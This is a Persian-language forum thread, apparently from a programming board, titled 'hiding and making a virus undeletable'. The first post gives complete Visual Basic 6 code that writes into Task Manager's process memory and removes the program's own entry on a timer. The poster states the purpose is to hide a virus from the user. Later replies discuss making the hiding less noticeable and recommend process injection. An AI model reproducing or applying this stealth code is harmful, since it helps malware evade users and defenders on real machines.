امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
مخفی کردن و غیر قابل حذف کردن ویروس
نویسنده پیام
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #1
مخفی کردن و غیر قابل حذف کردن ویروس
قدیما یه کد تو دلفی نوشته بودم که برنامتو از تسک منجرو اکسپلورر ,regedit,meconfig مخفی میکرد نمونه شبیه به اون رو به وبیب پیدا کردم امیدوارم مفید واقع بشه

.برای این کار باید ابتدا vb رو اجرا و بعد standard exe رو انتخاب کنیم و سه مرحله کار انجام بدیم[/quote]
مرحله ی اول
اول این کدها رو در قسمت general کپی کنید
کد:
Private Type bkh
flag As Long
psz As Long
lParam As Long
pt As Long
vkDirection As Long
End Type
Private Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Private Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
حالا این کدها رو جدا از قسمت form_load و general کپی کنید که خودش یک قسمت باشه
کد:
Private Sub Hide_Process(Name As String)
Dim pName As Long
Dim pType As Long
Dim l As Long
Dim Tid As Long
Dim hTid As Long
Dim pid As Long
Dim h As Long
Dim i As Long
Dim hProcess As Long
Dim f As bkh
Dim s As String
Dim bkh() As Byte
h = FindWindow(vbNullString, "Windows Task Manager")
KillTimer h, 0
h = FindWindowEx(h, 0, "#32770", vbNullString)
h = FindWindowEx(h, 0, "SysListView32", vbNullString)
If h = 0 Then Exit Sub
f.flag = 8 Or &H20
Call GetWindowThreadProcessId(h, pid)
hProcess = OpenProcess(1082, 0, pid)
bkh = StrConv(Name, vbFromUnicode)
pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4)
WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l
f.psz = pName
pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4)
WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l
i = SendMessage(h, &H1000 + 13, 0, pType)
If i <> -1 Then SendMessage h, &H1000 + 8, i, 0
VirtualFreeEx hProcess, pType, Len(f), &H8000
VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000
End Sub
حال یک timer با interval مناسب(مثلا" 1) درست کنید و کد زیر رو در timer قرار بدید
Hide_Process CStr(App.EXEName & ".exe")
در این جا باید بگم که منظور از app.exename،نام فایلی ویروس است و اگر نام فایلتان را مثلا" h بذاری،app.exename هم h می شود.حال ما ویروسی رو داریم که در لیست process های taskmanager مخفی است و از حالت اجرا درآوردن ویروس رو بسیار بسیار سخت میکنه
۱۹-خرداد-۱۳۸۷, ۱۷:۲۴:۲۸
وب سایت ارسال‌ها
پاسخ
yeketaz آفلاین
کاربر با تجربه
****

ارسال‌ها: 744
موضوع‌ها: 123
تاریخ عضویت: اسفند ۱۳۸۶

تشکرها : 520
( 1050 تشکر در 294 ارسال )
ارسال: #2
RE: مخفی کردن و غیر قابل حذف کردن ویروس
این کد تقریبا توی تمامی ویروسهایی که در وی بی نوشته می شوند به کار برده می شود و کار همون گزینه Hide Proccess توی ویروس میکرها و بقیه برنامه هاست

ما که دیگه توی ایران ویج پیر شدیم 040 کم کم باید جامون رو بدیم به جوونا 028
۱۹-خرداد-۱۳۸۷, ۱۷:۳۳:۳۲
وب سایت ارسال‌ها
پاسخ
Payman62 آفلاین
مدیر بخش ویژوال بیسیک
*****

ارسال‌ها: 2,273
موضوع‌ها: 149
تاریخ عضویت: اسفند ۱۳۸۴

تشکرها : 1308
( 3661 تشکر در 942 ارسال )
ارسال: #3
RE: مخفی کردن و غیر قابل حذف کردن ویروس
سلام.
این کد زیاد جالب نیست. چون هر ثانیه اسم برنامه از تسک منجر حذف میشه و دوباره تا لیست ریفرش میشه حذف میشه و این باعث چشمک زدن یا تیک زدن لیست تسک منجر میشه که بسیار شک بر انگیزه.
حالا میشه تایمر تسک منیجر رو کلا با killtimer از کار انداخت که چشمک نزنه. ولی اینم شک برانگیزه چون تو تب performance نمودارها تغییر نمیکنن.
۱۹-خرداد-۱۳۸۷, ۲۲:۵۴:۴۰
ارسال‌ها
پاسخ
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #4
RE: مخفی کردن و غیر قابل حذف کردن ویروس
Payman62 نوشته است:ولی اینم شک برانگیزه چون تو تب performance نمودارها تغییر نمیکنن.
درسته ولی بهتر از اینه که مثل جوجه ویروسها بیاد تسک منجر رو غیر فعال کنه برای performance هم میشه چک کرد که اگه focuse رو تب task , process نبود Settimer بشه و تایمر به کار بیفته
(میتونی اینجکت کنی کل برنامتو که دیگه این مشکلاتم نداشته باشهBiggrin)
۲۰-خرداد-۱۳۸۷, ۰۳:۰۶:۲۵
وب سایت ارسال‌ها
پاسخ
Payman62 آفلاین
مدیر بخش ویژوال بیسیک
*****

ارسال‌ها: 2,273
موضوع‌ها: 149
تاریخ عضویت: اسفند ۱۳۸۴

تشکرها : 1308
( 3661 تشکر در 942 ارسال )
ارسال: #5
RE: مخفی کردن و غیر قابل حذف کردن ویروس
سلام.
خوب اینجکت که بهترین روشه. ولی خوب یه مقدار نسبت به سایر روش ها مشکل تره.
در مورد settimer هم من قبلا خواستم این کارو بکنم. ولی نتونستم به تسک منیجر تایم بدم.
۲۰-خرداد-۱۳۸۷, ۱۹:۲۶:۵۹
ارسال‌ها
پاسخ
godvb غایب
مدیر بازنشسته بخش نفوذ و امنیت
*****

ارسال‌ها: 430
موضوع‌ها: 77
تاریخ عضویت: اسفند ۱۳۸۶

تشکرها : 886
( 1338 تشکر در 343 ارسال )
ارسال: #6
RE: مخفی کردن و غیر قابل حذف کردن ویروس
سلام . پیمان جان این روش که میگی بهتره اینجکت چطوریه . آیا منظورت همین اینجکت پروسس هستش من درباره اش تاپیک زدم ؟

آنچه توانسته ایم انجام دهیم، لطف پرودگار بوده است.

XMen For Ever
۲۲-خرداد-۱۳۸۷, ۱۳:۳۹:۲۵
ارسال‌ها
پاسخ
Payman62 آفلاین
مدیر بخش ویژوال بیسیک
*****

ارسال‌ها: 2,273
موضوع‌ها: 149
تاریخ عضویت: اسفند ۱۳۸۴

تشکرها : 1308
( 3661 تشکر در 942 ارسال )
ارسال: #7
RE: مخفی کردن و غیر قابل حذف کردن ویروس
سلام.
آره همون اینجکت پروسس.
۲۲-خرداد-۱۳۸۷, ۱۵:۵۲:۳۳
ارسال‌ها
پاسخ
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #8
RE: مخفی کردن و غیر قابل حذف کردن ویروس
اینجک کردن راحته فقط باید اندازه اطلاعات اولیه رو بدونی که اون هم کار زیاد سختی نیست انشاالله تو قسمت تخصصی ویروس نویسی
۲۲-خرداد-۱۳۸۷, ۱۸:۰۲:۳۱
وب سایت ارسال‌ها
پاسخ
تشکر شده توسط : Di Di


موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  خواندن و ارسال کردن اطلاعات با پورت سریال SBRE77 18 20,157 ۱۱-مهر-۱۳۹۷, ۰۹:۴۶:۲۸
آخرین ارسال: reza1354
  [سوال] جایگزین کردن درشته GTAexcess 1 2,745 ۰۸-اسفند-۱۳۹۴, ۱۴:۴۷:۲۳
آخرین ارسال: Di Di
  ذخیره کردن نتیجه اجرای کد به صورت رشته alefpe 1 2,740 ۱۰-خرداد-۱۳۹۴, ۱۰:۲۰:۲۲
آخرین ارسال: lord_viper
  راست به چپ کردن منو و ریبون automa 3 3,615 ۰۵-اردیبهشت-۱۳۹۴, ۰۸:۳۶:۳۱
آخرین ارسال: automa
  [سوال] مشخص کردن فایلی که روی شبکه باز شده eppagh 0 2,131 ۲۲-فروردین-۱۳۹۴, ۱۴:۰۶:۵۱
آخرین ارسال: eppagh
  [سوال] مشکل جابجا کردن مقدار متغیر از ThisWorkbook به Worksheet_Change در اکسل eppagh 0 2,200 ۰۸-اسفند-۱۳۹۳, ۲۱:۴۷:۵۴
آخرین ارسال: eppagh
  مشکل در راند کردن شمارە lonelysam 1 2,139 ۱۶-بهمن-۱۳۹۳, ۱۵:۳۲:۰۴
آخرین ارسال: Payman62
  [سوال] فوکوس کردن روی یک پنجره برنامه خاص bvk 1 2,453 ۱۶-بهمن-۱۳۹۳, ۱۵:۲۷:۲۵
آخرین ارسال: Payman62
  روشن کردن يک lED با usb با کد نويسي در vb6 هوشیاری 14 22,100 ۲۹-آذر-۱۳۹۳, ۱۳:۳۹:۲۰
آخرین ارسال: avrpicarm
  [سوال] ساختن و پاک کردن چارت با نامی که خودم می دهم eppagh 0 1,884 ۰۱-آذر-۱۳۹۳, ۰۹:۵۲:۳۴
آخرین ارسال: eppagh

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS